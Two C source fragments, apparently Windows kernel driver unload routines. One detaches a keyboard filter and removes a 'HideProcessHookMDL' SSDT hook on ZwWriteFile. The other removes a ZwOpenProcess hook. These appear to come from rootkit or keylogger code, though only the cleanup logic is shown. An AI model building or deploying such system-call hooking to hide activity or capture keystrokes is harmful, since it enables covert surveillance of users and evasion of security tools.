VOID Unload( IN PDRIVER_OBJECT pDriverObject ) { // Local variables KTIMER timer; // timer to wait for IRPs to die LARGE_INTEGER timeout; // timeout for the timer PDEVICE_EXTENSION pKeyboardDeviceExtension; DbgPrint("Begin DriverUnload routine.\n"); // Get the pointer to the device extension pKeyboardDeviceExtension = (PDEVICE_EXTENSION)pDriverObject->DeviceObject->DeviceExtension; // Detach from the device underneath that we're hooked to IoDetachDevice(pKeyboardDeviceExtension->pKeyboardDevice); //***Begin HideProcessHookMDL SSDT hook code*** // Unhook SSDT call, disable interrupts first _asm{cli} UNHOOK_SYSCALL(ZwWriteFile, OldZwWriteFile, NewZwWriteFile); _asm{sti} // Unlock and free MDL if(g_pmdlSystemCall) { MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall); IoFreeMdl(g_pmdlSystemCall); } //*** End HideProcessHookMDL SSDT hook code*** // Initialize a timer timeout.QuadPart = 1000000; KeInitializeTimer(&timer); // Wait for pending IRPs to finish while (numPendingIrps > 0) { KeSetTimer(&timer, timeout, NULL); KeWaitForSingleObject(&timer, Executive, KernelMode, FALSE, NULL); } // Delete the device IoDeleteDevice(pDriverObject->DeviceObject); //TODO: clean up any remaining resources, close any files, etc.. // Done. return; } // Unload
VOID OnUnload(IN PDRIVER_OBJECT DriverObject) { DbgPrint("Descargando driver..."); //Unhookeamos UNHOOK_SYSCALL( ZwOpenProcess, ZwOpenProcessIni, NewZwOpenProcess ); //Eliminamos la MDL if(g_pmdlSystemCall) { MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall); IoFreeMdl(g_pmdlSystemCall); } }